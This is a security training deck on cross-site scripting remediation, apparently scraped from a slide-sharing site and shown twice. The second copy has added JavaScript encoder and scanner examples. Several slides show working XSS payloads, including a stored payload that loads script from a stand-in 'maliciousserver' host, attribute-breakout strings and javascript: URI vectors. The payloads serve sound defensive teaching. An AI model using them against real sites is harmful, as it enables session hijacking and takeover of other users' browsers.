Cross-Site Scripting (XSS) Remediation
           Guerilla Training Camp
           Security BSides Austin

           Dan Cornell




© Copyright 2011 Denim Group - All Rights Reserved
My Background
 • Dan Cornell, founder and CTO of Denim Group
 • Software developer by background (Java, .NET, etc)
 • OWASP San Antonio, Global Membership Committee

 • Denim Group
         – Build software with special security, performance, reliability
           requirements
         – Help organizations deal with the risk associated with their software
                  • Code reviews and application assessments
                  • SDLC consulting
                  • Secure development training – instructor-led and eLearning

Agenda
 • What is Cross-Site Scripting (XSS)?

 • How Do You Remediate XSS Vulnerabilities?

 • Questions




Vulnerability: Cross-Site Scripting

                      #2 in the OWASP Top 10

                      If an attacker controls your browser – it is no longer your
                      browser




Let's look at a simple application
 [Diagram: the Administrator's web browser uses the Administrative Pages and the Attacker's web browser uses the User Pages of the Web Application; both sets of pages read from and write to the same Database.]

A standard user can update the name and email address on their profile:
    NormalGuy
    normalguy@normalmail.com

 An administrative user can retrieve this information, shown in a page:
   <input type="text" name="name" value="NormalGuy"><br>
   <input type="text" name="email" value="normalguy@normalmail.com">




With normal input

    <input type="text" name="name" value="NormalGuy"><br>
    <input type="text" name="email" value="normalguy@normalmail.com">

 [Diagram: the User's web browser submits NormalGuy / normalguy@normalmail.com to the User Pages, which store it in the Database; the Administrator's web browser then receives the markup above from the Administrative Pages.]

A malicious user can inject malicious scripts into their profile:
   MaliciousGuy
   "><script src="http://maliciousserver/rewritepage.js" />

 When the administrative user retrieves this information:
   <input type="text" name="name" value="MaliciousGuy"><br>
   <input type="text" name="email" value=""><script src="http://maliciousserver/rewritepage.js" />">




With malicious input
             <input type="text" name="name" value="MaliciousGuy"><br>
             <input type="text" name="email" value=""><script src="http://maliciousserver/rewritepage.js" />">

 [Diagram: the Attacker's web browser submits MaliciousGuy / "><script src="http://maliciousserver/rewritepage.js" /> to the User Pages, which store it in the Database; the Administrator's web browser then receives the markup above from the Administrative Pages and runs the injected script.]

What is Cross-Site Scripting?
 • Occurs when an application takes data from a user and sends it back
   to a web browser without validation or encoding
 • Victim's browser renders HTML and executes JavaScript chosen by
   the Attacker
 • Not a direct attack on the application – it is an attack on users of the
   application
         – Exploitation can involve many scenarios including social engineering
 • Most common web application security issue
         – Based on MITRE statistics




Impact of Cross-Site Scripting
 What can an attacker accomplish with a malicious script?




Cross-Site Scripting Attacks
 • Attackers may have different means to have their code execute in
   another user's browser

 • Reflected
 • Stored
 • DOM Based




Reflected Cross-Site Scripting
 • Attacker crafts a malicious link containing the payload
 • Attacker makes that link available for victims to click
 • Victim encounters malicious link and clicks
 • Web application reflects the payload back to the victim's browser
   where it is rendered and executed
 • Commonly found in
         – Login pages
         – Message pages




Reflected Cross-Site Scripting
 [Sequence diagram with participants Attacker, User, Web Application and Malicious Web Server:]
 • Attacker → User: send e-mail to user with link
 • User → Web Application: link makes request to website
 • Web Application → User: response includes malicious content
 • Malicious content sends authentication information to attacker's resources,
   or malicious content redirects user to malicious website (Malicious Web Server)

Stored Cross-Site Scripting
 • Attacker posts payload to a database or other data store
 • Victim uses the same site and visits a page where the payload is sent
   back to the victim
 • The payload is rendered and executed in the browser
 • Commonly found in
         – Message boards
           (horizontal privilege escalation)
         – User management systems
           (vertical privilege escalation)




Stored Cross-Site Scripting
 [Sequence diagram with participants Attacker, Web Application and User:]
 • Attacker → Web Application: submit field with malicious content
 • User → Web Application: request for content to approve
 • Web Application → User: reply containing malicious content

DOM-based Cross-Site Scripting
 •     Attacker crafts a malicious link containing the payload
 •     Attacker makes that link available for victims to click
 •     Victim encounters malicious link and clicks
 •     Client-side code parses user-supplied data to make decisions
 •     Things to look for
         –     document.URL
         –     document.URLUnencoded
         –     document.location (and its other properties)
         –     document.referrer
         –     window.location (and its other properties)
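The safe counterpart of the pattern described above, as an added example that is not part of the deck: a page script reads its own URL (the same data that window.location and document.URL expose), makes its decision from an allowlist, positively validates the fragment value, and writes user-controlled text through textContent rather than innerHTML, so the browser never parses it as markup. pickLanguage, displayNameFromUrl, mountGreeting and fakeDocument are hypothetical names written for this example, and the sample URLs are constructed.

```javascript
// Added example, not from the deck: reading DOM-based XSS sources safely.
// pickLanguage, displayNameFromUrl, mountGreeting and fakeDocument are
// hypothetical helper names chosen for this example.

const SUPPORTED_LANGS = new Set(["en", "de", "es"]);
const DISPLAY_NAME_RE = /^[A-Za-z0-9_ ]{1,30}$/;

// A decision made from user-supplied data (?lang=): only an allowlisted value
// is ever used; anything else falls back to the default.
function pickLanguage(href) {
  const requested = new URL(href).searchParams.get("lang") ?? "";
  return SUPPORTED_LANGS.has(requested) ? requested : "en";
}

// Data taken from the fragment. The fragment is never sent to the server, so
// server-side validation and request filters never see it. Positive validation:
// anything outside the expected syntax yields null rather than a "cleaned" string.
function displayNameFromUrl(href) {
  let raw;
  try {
    raw = decodeURIComponent(new URL(href).hash.slice(1));
  } catch (e) {
    return null; // malformed percent-encoding
  }
  return DISPLAY_NAME_RE.test(raw) ? raw : null;
}

// Sink: textContent inserts the string as text; innerHTML would parse it as
// markup. In a browser this is called as mountGreeting(document, location.href).
function mountGreeting(doc, href) {
  const name = displayNameFromUrl(href) ?? "guest";
  const el = doc.getElementById("greeting");
  el.textContent = `Welcome back, ${name}`;
  el.setAttribute("lang", pickLanguage(href));
  return el.textContent;
}

// Constructed stand-in for the browser document so the example runs in Node.
function fakeDocument() {
  const el = {
    textContent: "",
    attrs: {},
    setAttribute(key, value) { this.attrs[key] = value; },
  };
  return { getElementById: () => el, el };
}

// Constructed sample URLs: a benign one and one carrying the deck's basic payload.
const BENIGN_URL = "https://example.test/?lang=de#Alice%20B";
const PAYLOAD_URL = "https://example.test/?lang=es#<script>alert('hi');</script>";

console.log(mountGreeting(fakeDocument(), BENIGN_URL));
console.log(mountGreeting(fakeDocument(), PAYLOAD_URL));
```

The point of returning null instead of stripping characters is that the fallback path is exercised explicitly and can be logged; a "sanitised" string would still be attacker-shaped data flowing into the sink.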




Crafting XSS Payloads
 • Most basic, if payload is echoed directly into open HTML
         – <script>alert('hi');</script>
 • Sometimes you may have to deal with application HTML
         – <input name='uname' value='<%= Request["uname"] %>' />
         – uname parameter must:
                  •   Close out the value attribute: '>
                  •   Then include the payload: <script>alert('hi');</script>
                  •   Then clean up before the application HTML starts again: <'
                  •   Full payload: '><script>alert('hi');</script><'




Crafting XSS Payloads
 Script with the 'src' attribute
 <SCRIPT SRC=http://malicioushost/maliciousscript.js></SCRIPT>
 An attacker is likely to use the 'src' attribute if the script requires more
   space than the application accommodates.

 Image
 <IMG SRC="javascript:alert('XSS');">


 Body
 <BODY BACKGROUND="javascript:alert('XSS')">




Crafting XSS Payloads
 Input
 <INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">


 Iframe
 <IFRAME SRC="javascript:alert('XSS');"></IFRAME>
 In addition, the iframe can point to a malicious page on a remote host.

 Table
 <TABLE BACKGROUND="javascript:alert('XSS')">


 Div
 <DIV STYLE="background-image: url(&#1;javascript:alert('XSS'))">



Impact
 • Attacker can render HTML and execute script in the victim's browser,
   resulting in:
         –     Session hijacking (adding JavaScript that forwards cookies to an attacker)
         –     Misinformation (adding "For more info call 1-800-A-BAD-GUY" to a page)
         –     Defacing web site (adding "This company is terrible!!!" to a page)
         –     Inserting hostile content (adding malicious ActiveX controls to a page)
         –     Phishing attacks (adding login FORM posts to 3rd party sites)
         –     Takeover of the user's browser (adding JavaScript code to redirect the user)




Mitigation
 • Positively validate inputs
         – Length, type, syntax, business rules
 • Encode application outputs
         – HTML or XML
         – < becomes &lt; and so on
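Both mitigations applied to the profile page from the earlier slides, as an added JavaScript example that is not from the deck: positive validation of the name and e-mail fields (length and syntax), and context-aware output encoding, with one encoder for data between tags and a stricter one for data inside attribute values, which is where the deck's injected profile lands. encodeForHtml, encodeForHtmlAttribute, validateProfile and renderProfile are hypothetical names written for this example; the two sample profiles are constructed from the values on the earlier slides.

```javascript
// Added example, not from the deck: positive input validation plus
// context-aware output encoding for the profile page used in the slides.
// encodeForHtml, encodeForHtmlAttribute, validateProfile and renderProfile are
// hypothetical helper names chosen for this example.

// Encode data placed between tags (HTML body context).
function encodeForHtml(value) {
  return String(value)
    .replace(/&/g, "&amp;") // first, so later references are not double-encoded
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#x27;")
    .replace(/\//g, "&#x2F;");
}

// Encode data placed inside a quoted attribute value. Every non-alphanumeric
// character becomes a numeric reference, so the data can neither close the
// attribute nor start a new tag, whichever quote character the template used.
function encodeForHtmlAttribute(value) {
  return String(value).replace(/[^A-Za-z0-9]/gu, (ch) => `&#${ch.codePointAt(0)};`);
}

// Positive validation of the two profile fields: length, type and syntax.
// Rejecting out-of-spec input is the first line of defence; it does not
// replace encoding on output.
const NAME_RE = /^[A-Za-z][A-Za-z0-9 .'-]{0,39}$/;
const EMAIL_RE = /^[A-Za-z0-9._%+-]{1,64}@[A-Za-z0-9.-]{1,253}\.[A-Za-z]{2,}$/;

function validateProfile({ name, email }) {
  const errors = [];
  if (!NAME_RE.test(name)) errors.push("name");
  if (!EMAIL_RE.test(email)) errors.push("email");
  return { ok: errors.length === 0, errors };
}

// The administrator's view: the name appears once in body context and both
// fields appear in attribute context, so each insertion uses the matching encoder.
function renderProfile({ name, email }) {
  return [
    `<p>Profile for ${encodeForHtml(name)}</p>`,
    `<input type="text" name="name" value="${encodeForHtmlAttribute(name)}"><br>`,
    `<input type="text" name="email" value="${encodeForHtmlAttribute(email)}">`,
  ].join("\n");
}

// Constructed sample inputs mirroring the deck's two users.
const NORMAL_GUY = { name: "NormalGuy", email: "normalguy@normalmail.com" };
const MALICIOUS_GUY = {
  name: "MaliciousGuy",
  email: '"><script src="http://maliciousserver/rewritepage.js" />',
};

console.log(validateProfile(NORMAL_GUY));    // accepted
console.log(validateProfile(MALICIOUS_GUY)); // rejected on the email field
// Even if the stored payload had slipped past validation, the rendered page
// contains no '<' or '"' from user data, only character references.
console.log(renderProfile(MALICIOUS_GUY));
```

The attribute encoder is deliberately more aggressive than the body encoder: the deck's payload works by closing the value attribute with a quote, and encoding every non-alphanumeric character removes that option without having to reason about which quote style each template uses.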




Java-specific Safeguards
 • Avoid using <%= %> because that does not encode outputs
 • Escape special HTML characters
         – < > ' " / & and so on…
 • Use URLEncoder class to encode characters being placed in a URL
 • Use Struts output mechanisms such as <bean:write …>
 • Use the JSTL escapeXml="true" attribute in <c:out …>

 • Use ESAPI Encoders




.NET-specific Safeguards
 • .NET has built-in blacklist validation against many known XSS attacks
         – This is good, but not ideal
         – This can be turned off with ValidateRequest="false" in the Page tag (BAD!)
 • Validation framework offers many protection options
         – RegExValidator and others
 • Avoid using <%= %> because that does not encode outputs
         – Look at <%: %> syntax in ASP.NET 4
         – http://weblogs.asp.net/scottgu/archive/2010/04/06/new-lt-gt-syntax-for-html-encoding-output-in-asp-net-4-and-asp-net-mvc-2.aspx
 • Better: Use HttpUtility.HtmlEncode() to encode user-supplied
   data that is reflected back to users
 • Best: Microsoft Web Protection Library (WPL)
         – http://wpl.codeplex.com/

Cross-Site Scripting Recap
 • Cross-Site Scripting (XSS) occurs when an application takes data
   from a user and sends it back to a web browser without validation or
   encoding
 • There are three main varieties:
         – Stored
         – Reflected
         – DOM-based
 • To guard against:
         – Positively validate inputs
         – Escape user-supplied data sent back to the browser




OWASP ESAPI
 • Sites:
         – Main: http://www.owasp.org/index.php/Category:OWASP_Enterprise_Security_API
         – Java: http://www.owasp.org/index.php/Category:OWASP_Enterprise_Security_API#tab=Java_EE


 • Good: Provides very robust set of encoder functions
 • Less good:
         – Has a number of dependencies (~29) (currently – work on modularity is in progress)
         – Implementations are of varying maturity. Most useful for Java.




OWASP ESAPI (Java)
 • To Use:
         – Follow the installation guide
         – Must create a folder (.esapi) to store your configuration and preferences
 • Get access to library:
         – Add all the support jars (31) to your project
         – Remove repeated jars
         – Add esapi-2.0_rc10.jar to your project
         <%@ page import="org.owasp.esapi.ESAPI, org.owasp.esapi.Encoder" %>

 • Make calls to encode tainted data:
         – ESAPI.encoder().encodeForHTML()
         – ESAPI.encoder().encodeForHTMLAttribute()




ASP.NET Request Validation
 • ASP.NET provides some blacklist-based input validation to try and
   guard against HTML injection and cross-site scripting (XSS) attacks

 • This is turned on by default (yeah!)
 • Many applications disable it (boo!)
         – Blocked a valid request
         – Made trouble with AJAX
         – And so on




ASP.NET Request Validation
 • How to configure or check if it is enabled?

 • This is turned on by default

 • In web.config:
         <configuration>
                  <system.web>
                           <pages validateRequest="true|false" />
                  </system.web>
         </configuration>


 • Per-page:
         <%@ Page … ValidateRequest="true|false" %>

Microsoft Web Protection Library
 • Main site:
         – http://wpl.codeplex.com/
 • To use:
         – Import reference to AntiXSS.dll (optionally include HtmlSanitizationLibrary.dll)
                   • Found in C:\Program Files (x86)\Microsoft Information Security\AntiXSS Library v4.0
         – Get access to library:
                  • In code:
                          – using Microsoft.Security.Application;
                  • In ASPX page:
                          – <%@ Import Namespace="Microsoft.Security.Application" %>
         – Make call to encode tainted data:
                  • AntiXss.HtmlEncode()
                  • AntiXss.HtmlAttributeEncode()
                  • And so on…



Exercise: Fixing XSS Vulnerabilities
 • Java
         – Reflected XSS
         – Stored XSS
 • ASP.NET
         – Reflected XSS
         – Stored XSS




But Your ASP.NET Examples Cheated!
 • This is true: ASP.NET provides some XSS protection via the
   ValidateRequest functionality

 • However:
         – This can be (and is often) turned off on a per-page or site-wide basis
         – It has been defeated in the past and will be defeated again in the future
                   • http://www.procheckup.com/vulnerability_manager/documents/document_1258758664/bypassing-dot-NET-ValidateRequest.pdf
                   • http://www.blackhat.com/presentations/bh-usa-09/VELANAVA/BHUSA09-VelaNava-FavoriteXSS-SLIDES.pdf


 • If you want your code to be “Rugged” then you need to actually guard
   against cross-site scripting vulnerabilities in your code


Resources
 • OWASP ESAPI
         – http://www.owasp.org/index.php/Category:OWASP_Enterprise_Security_API
 • Microsoft Web Protection Library
         – http://wpl.codeplex.com/


 • Denim Group Remediation Resource Center
         – www.denimgroup.com/remediation




Questions?
 Dan Cornell
 dan@denimgroup.com
 Twitter: @danielcornell

 www.denimgroup.com
 (210) 572-4400





The Codex of Business Writing Software for Real-World Solutions 2.pptxThe Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptx
 
Real Time Object Detection Using Open CV
Real Time Object Detection Using Open CVReal Time Object Detection Using Open CV
Real Time Object Detection Using Open CV
 
Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024
 
Data Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt RobisonData Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt Robison
 
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
 
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
Workshop - Best of Both Worlds_ Combine  KG and Vector search for  enhanced R...Workshop - Best of Both Worlds_ Combine  KG and Vector search for  enhanced R...
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
 
Factors to Consider When Choosing Accounts Payable Services Providers.pptx
Factors to Consider When Choosing Accounts Payable Services Providers.pptxFactors to Consider When Choosing Accounts Payable Services Providers.pptx
Factors to Consider When Choosing Accounts Payable Services Providers.pptx
 
Driving Behavioral Change for Information Management through Data-Driven Gree...
Driving Behavioral Change for Information Management through Data-Driven Gree...Driving Behavioral Change for Information Management through Data-Driven Gree...
Driving Behavioral Change for Information Management through Data-Driven Gree...
 
Histor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slideHistor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slide
 
Exploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone ProcessorsExploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone Processors
 
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
 

XSS Remediation

• 1. Cross-Site Scripting (XSS) Remediation
  Guerilla Training Camp
  Security BSides Austin
  Dan Cornell
  © Copyright 2011 Denim Group - All Rights Reserved
• 2. My Background
  • Dan Cornell, founder and CTO of Denim Group
  • Software developer by background (Java, .NET, etc.)
  • OWASP San Antonio, Global Membership Committee
  • Denim Group
    – Build software with special security, performance, reliability requirements
    – Help organizations deal with the risk associated with their software
      • Code reviews and application assessments
      • SDLC consulting
      • Secure development training – instructor-led and eLearning
• 3. Agenda
  • What is Cross-Site Scripting (XSS)?
  • How Do You Remediate XSS Vulnerabilities?
  • Questions
• 4. Vulnerability: Cross-Site Scripting
  #2 in the OWASP Top 10 (2010 edition)
  If an attacker controls your browser – it is no longer your browser
• 5. Let's look at a simple application
  (Diagram: an Administrator and an Attacker each use a Web Browser to reach the Web Application; its Administrative Pages and User Pages share one Database.)
• 6. A standard user can update the name and email address on their profile:
  NormalGuy
  normalguy@normalmail.com
  An administrative user can retrieve this information, shown in a page:
  <input type="text" name="name" value="NormalGuy"><br>
  <input type="text" name="email" value="normalguy@normalmail.com">
• 7. With normal input
  <input type="text" name="name" value="NormalGuy"><br>
  <input type="text" name="email" value="normalguy@normalmail.com">
  (Diagram: the User's browser submits NormalGuy / normalguy@normalmail.com to the User Pages, which store it in the Database; the Administrator's browser later receives it from the Administrative Pages.)
• 8. A malicious user can inject malicious scripts into their profile:
  MaliciousGuy
  "><script src="http://maliciousserver/rewritepage.js"></script>
  When the administrative user retrieves this information, the stored value closes the value attribute and opens a script tag of the attacker's choosing:
  <input type="text" name="name" value="MaliciousGuy"><br>
  <input type="text" name="email" value=""><script src="http://maliciousserver/rewritepage.js"></script>">
• 9. With malicious input
  <input type="text" name="name" value="MaliciousGuy"><br>
  <input type="text" name="email" value=""><script src="http://maliciousserver/rewritepage.js"></script>">
  (Diagram: the Attacker's browser submits MaliciousGuy / "><script src="http://maliciousserver/rewritepage.js"></script> to the User Pages; the Database stores it unchanged; the Administrator's browser receives it from the Administrative Pages and executes it.)
• 10. What is Cross-Site Scripting?
  • Occurs when an application takes data from a user and sends it back to a web browser without validation or encoding
  • The victim's browser renders HTML and executes JavaScript chosen by the attacker
  • Not a direct attack on the application: it is an attack on the users of the application
    – Exploitation can involve many scenarios, including social engineering
  • Most common web application security issue
    – Based on MITRE statistics
• 11. Impact of Cross-Site Scripting
  What can an attacker accomplish with a malicious script?
• 12. Cross-Site Scripting Attacks
  • Attackers have several ways to get their code to execute in another user's browser:
  • Reflected
  • Stored
  • DOM Based
• 13. Reflected Cross-Site Scripting
  • Attacker crafts a malicious link containing the payload
  • Attacker makes that link available for victims to click
  • Victim encounters the malicious link and clicks
  • Web application reflects the payload back to the victim's browser, where it is rendered and executed
  • Commonly found in
    – Login pages
    – Message pages
• 14. Reflected Cross-Site Scripting
  (Sequence diagram with Attacker, User, Web Application and Malicious Web Server)
    – Attacker sends e-mail to user with link
    – Link makes request to website
    – Response includes malicious content
    – Malicious content sends authentication information to attacker's resources, or malicious content redirects user to malicious website
• 15. Stored Cross-Site Scripting
  • Attacker posts payload to a database or other data store
  • Victim uses the same site and visits a page where the payload is sent back to the victim
  • The payload is rendered and executed in the browser
  • Commonly found in
    – Message boards (horizontal privilege escalation)
    – User management systems (vertical privilege escalation)
• 16. Stored Cross-Site Scripting
  (Sequence diagram with Attacker, Web Application and User)
    – Attacker submits field with malicious content
    – User requests content to approve
    – Reply contains malicious content
• 17. DOM-based Cross-Site Scripting
  • Attacker crafts a malicious link containing the payload
  • Attacker makes that link available for victims to click
  • Victim encounters the malicious link and clicks
  • Client-side code parses user-supplied data to make decisions and writes it into the page; the payload is inserted by the page's own JavaScript rather than by the server
  • Things to look for
    – document.URL
    – document.URLUnencoded
    – document.location (and its other properties)
    – document.referrer
    – window.location (and its other properties)
  • Caveat: when the payload travels in the URL fragment (after the #), the browser never sends it to the server, so server-side validation, output encoding and WAF rules never see it; the fix has to be made in the client-side code
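The "things to look for" list above turns into a quick triage pass when you have a few hundred client-side files to review. The following is an added example in JavaScript (Node.js); it is not code from the deck or from Denim Group. It flags every line that reads one of the listed sources and raises the severity when a sink that interprets its argument as HTML or code sits on the same line. The sink list and the SAMPLE_JS lines are constructed for the example, and the scan is deliberately line-local: it does not follow a value from one line into the next, so "review" findings still need a human to trace them forward.

```javascript
// Added example (not from the deck): a line-local triage pass for DOM-based
// XSS. It flags any client-side line that reads one of the sources listed on
// slide 17 and raises the severity when a sink that interprets its argument
// as HTML or code sits on the same line. SAMPLE_JS is constructed for this
// example; in practice you would feed it the application's own .js files.

const DOM_SOURCES = [
  "document.URL",
  "document.URLUnencoded",
  "document.location",
  "document.referrer",
  "window.location",
  "location.hash",
  "location.search",
];

// Sinks that render or execute their input.
const DOM_SINKS = [
  /\.innerHTML\s*=/,
  /\.outerHTML\s*=/,
  /\bdocument\.write(ln)?\s*\(/,
  /\beval\s*\(/,
  /\binsertAdjacentHTML\s*\(/,
  /\bsetTimeout\s*\(\s*["'`]/,
];

function findSources(line) {
  return DOM_SOURCES.filter((src) => line.includes(src));
}

function findSinks(line) {
  return DOM_SINKS.filter((re) => re.test(line)).map((re) => re.source);
}

// Returns one finding per line that touches a source. "high" means a sink is
// on the same line; "review" means the value is read here and must be traced
// forward by hand (this pass does not follow data across lines).
function triage(lines) {
  const findings = [];
  lines.forEach((line, index) => {
    const sources = findSources(line);
    if (sources.length === 0) return;
    const sinks = findSinks(line);
    findings.push({
      line: index + 1,
      sources,
      sinks,
      severity: sinks.length > 0 ? "high" : "review",
      text: line.trim(),
    });
  });
  return findings;
}

// Constructed client-side code. Line 1 feeds line 2 through a variable, which
// is exactly the flow a line-local scan can only flag for manual review.
const SAMPLE_JS = [
  'var name = decodeURIComponent(document.location.hash.substring(1));',
  'document.getElementById("greeting").innerHTML = "Hello " + name;',
  'document.write("<p>You came from " + document.referrer + "</p>");',
  'eval("show_" + document.URL.split("#")[1] + "()");',
  'el.textContent = window.location.search;',
  'window.location = "/home";',
  'var total = price * qty;',
];

for (const f of triage(SAMPLE_JS)) {
  console.log(`line ${f.line} [${f.severity}] sources=${f.sources.join(",")} sinks=${f.sinks.length} :: ${f.text}`);
}
```

On the sample, lines 3 and 4 come back "high" (referrer into document.write, document.URL into eval) and lines 1, 5 and 6 come back "review". Line 2 is the real bug in that snippet and is not flagged on its own, which is the point: a grep finds the sources, a developer has to follow them to the sink.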
• 18. Crafting XSS Payloads
  • Most basic, if payload is echoed directly into open HTML
    – <script>alert('hi');</script>
  • Sometimes you may have to deal with application HTML
    – <input name='uname' value='<%= Request["uname"] %>' />
    – uname parameter must:
      • Close out the value attribute: '>
      • Then include the payload: <script>alert('hi');</script>
      • Then clean up before the application HTML starts again: <'
      • Full payload: '><script>alert('hi');</script><'
    – The remediation lesson: the payload is shaped by the context it lands in, so the encoding applied on output has to match that context (here a single-quoted attribute value, where ' must be encoded)
• 19. Crafting XSS Payloads
  Script with the 'src' attribute
    <SCRIPT SRC=http://malicioushost/maliciousscript.js></SCRIPT>
  An attacker is likely to use the 'src' attribute if the script requires more space than the application accommodates.
  Image
    <IMG SRC="javascript:alert('XSS');">
  Body
    <BODY BACKGROUND="javascript:alert('XSS')">
• 20. Crafting XSS Payloads
  Input
    <INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">
  Iframe
    <IFRAME SRC="javascript:alert('XSS');"></IFRAME>
  In addition, the iframe can point to a malicious page on a remote host.
  Table
    <TABLE BACKGROUND="javascript:alert('XSS')">
  Div
    <DIV STYLE="background-image: url(&#1;javascript:alert('XSS'))">
  Caveat: apart from the IFRAME, the javascript: URI vectors on these two slides only fire in legacy browsers (old Internet Explorer, Netscape); current browsers do not execute javascript: URIs in IMG, BODY, INPUT or TABLE sources or inside CSS url(). They remain a useful reminder that filtering for the string <script> is not a defence; output encoding is.
• 21. Impact
  • Attacker can render HTML and execute script in the victim's browser, resulting in:
    – Session hijacking (adding JavaScript that forwards cookies to an attacker)
    – Misinformation (adding "For more info call 1-800-A-BAD-GUY" to a page)
    – Defacing web site (adding "This company is terrible!!!" to a page)
    – Inserting hostile content (adding malicious ActiveX controls to a page)
    – Phishing attacks (adding login FORM posts to 3rd party sites)
    – Takeover of the user's browser (adding JavaScript code to redirect the user)
• 22. Mitigation
  • Positively validate inputs
    – Length, type, syntax, business rules
  • Encode application outputs
    – HTML or XML
    – < becomes &lt; and so on
    – Encode for the context the data is written into: HTML body, HTML attribute, JavaScript string, URL parameter and CSS each need a different encoder
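The profile page from slides 6 to 9, the attribute-breakout payload from slide 18 and the encoding rule on this slide, put together as an added example in JavaScript (Node.js). This is not code from the deck or from Denim Group: the two template functions, the encoder and the sample profiles are constructed for the example, and the encoder's character set follows the list on slide 23 (& < > " ' /) rather than any particular library. What it shows is that one encoder, applied on the way out to every untrusted value, neutralises both the double-quoted and the single-quoted attribute payloads with no blacklist involved.

```javascript
// Added example (not from the deck): vulnerable and hardened versions of the
// admin profile page, plus the output encoder that fixes it.

// Characters that must be encoded before user data lands in HTML body text or
// in a quoted attribute value. Encoding both quote styles is what stops a
// "> or '> payload from terminating the attribute it was placed in.
const HTML_ESCAPES = {
  "&": "&amp;",
  "<": "&lt;",
  ">": "&gt;",
  '"': "&quot;",
  "'": "&#x27;",
  "/": "&#x2F;",
};

// Encode a value for use in HTML element content or a quoted attribute value.
function encodeForHtml(value) {
  return String(value).replace(/[&<>"'\/]/g, (ch) => HTML_ESCAPES[ch]);
}

// Vulnerable: raw interpolation, the equivalent of <%= ... %> in JSP or ASPX.
function renderProfileUnsafe(profile) {
  return (
    `<input type="text" name="name" value="${profile.name}"><br>\n` +
    `<input type="text" name="email" value="${profile.email}">`
  );
}

// Hardened: every untrusted value goes through the encoder on the way out.
function renderProfileSafe(profile) {
  return (
    `<input type="text" name="name" value="${encodeForHtml(profile.name)}"><br>\n` +
    `<input type="text" name="email" value="${encodeForHtml(profile.email)}">`
  );
}

// The single-quoted attribute from slide 18, vulnerable and hardened.
function renderUnameUnsafe(uname) {
  return `<input name='uname' value='${uname}' />`;
}
function renderUnameSafe(uname) {
  return `<input name='uname' value='${encodeForHtml(uname)}' />`;
}

// Count opening tags in the output. The templates above emit a fixed number,
// so anything extra means user data escaped its attribute.
function countOpenTags(html) {
  return (html.match(/<[a-zA-Z]/g) || []).length;
}

// Constructed sample data mirroring slides 6, 8 and 18.
const normalGuy = { name: "NormalGuy", email: "normalguy@normalmail.com" };
const maliciousGuy = {
  name: "MaliciousGuy",
  email: '"><script src="http://maliciousserver/rewritepage.js"></script>',
};
const slide18Payload = "'><script>alert('hi');</script><'";

console.log("unsafe:\n" + renderProfileUnsafe(maliciousGuy));
console.log("safe:\n" + renderProfileSafe(maliciousGuy));
console.log("unsafe uname: " + renderUnameUnsafe(slide18Payload));
console.log("safe uname:   " + renderUnameSafe(slide18Payload));
```

Running it prints the four renderings; the unsafe ones contain a fourth (profile) or second (uname) opening tag that the template never wrote, the safe ones do not, and benign input such as NormalGuy renders identically through both paths. The tag count is a cheap check to keep around in unit tests for any template that emits a known shape.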
• 23. Java-specific Safeguards
  • Avoid using <%= %> because that does not encode outputs
  • Escape special HTML characters
    – < > ' " / & and so on…
  • Use the URLEncoder class to encode characters being placed in a URL query string
  • Use Struts output mechanisms such as <bean:write …>
  • Use the JSTL escapeXml="true" attribute in <c:out …> (it is the default, so <c:out> encodes unless someone has set escapeXml="false")
  • Use ESAPI Encoders
• 24. .NET-specific Safeguards
  • .NET has built-in blacklist validation against many known XSS attacks
    – This is good, but not ideal
    – This can be turned off with ValidateRequest="false" in the Page directive (BAD!)
  • Validation framework offers many protection options
    – RegularExpressionValidator and others
  • Avoid using <%= %> because that does not encode outputs
    – Look at the <%: %> syntax in ASP.NET 4
    – http://weblogs.asp.net/scottgu/archive/2010/04/06/new-lt-gt-syntax-for-html-encoding-output-in-asp-net-4-and-asp-net-mvc-2.aspx
  • Better: Use HttpUtility.HtmlEncode() to encode user-supplied data that is reflected back to users
  • Best: Microsoft Web Protection Library (WPL)
    – http://wpl.codeplex.com/
• 25. Cross-Site Scripting Recap
  • Cross-Site Scripting (XSS) occurs when an application takes data from a user and sends it back to a web browser without validation or encoding
  • There are three main varieties:
    – Stored
    – Reflected
    – DOM-based
  • To guard against:
    – Positively validate inputs
    – Escape user-supplied data sent back to the browser
• 26. OWASP ESAPI
  • Sites:
    – Main: http://www.owasp.org/index.php/Category:OWASP_Enterprise_Security_API
    – Java: http://www.owasp.org/index.php/Category:OWASP_Enterprise_Security_API#tab=Java_EE
  • Good: Provides a very robust set of encoder functions
  • Less good:
    – Has a number of dependencies (~29) (currently – work on modularity is in progress)
    – Implementations are of varying maturity. Most useful for Java.
• 27. OWASP ESAPI (Java)
  • To Use:
    – Follow the installation guide
    – Must create a folder (.esapi) to store your configuration and preferences
  • Get access to library:
    – Add all the support jars (31) to your project
    – Remove repeated jars
    – Add esapi-2.0_rc10.jar to your project
    – <%@ page import="org.owasp.esapi.ESAPI, org.owasp.esapi.Encoder" %>
  • Make calls to encode tainted data:
    – ESAPI.encoder().encodeForHTML()
    – ESAPI.encoder().encodeForHTMLAttribute()
    – Pick the encoder for the context: encodeForHTML() for element content, encodeForHTMLAttribute() for quoted attribute values such as the value="…" fields on slides 6 to 9
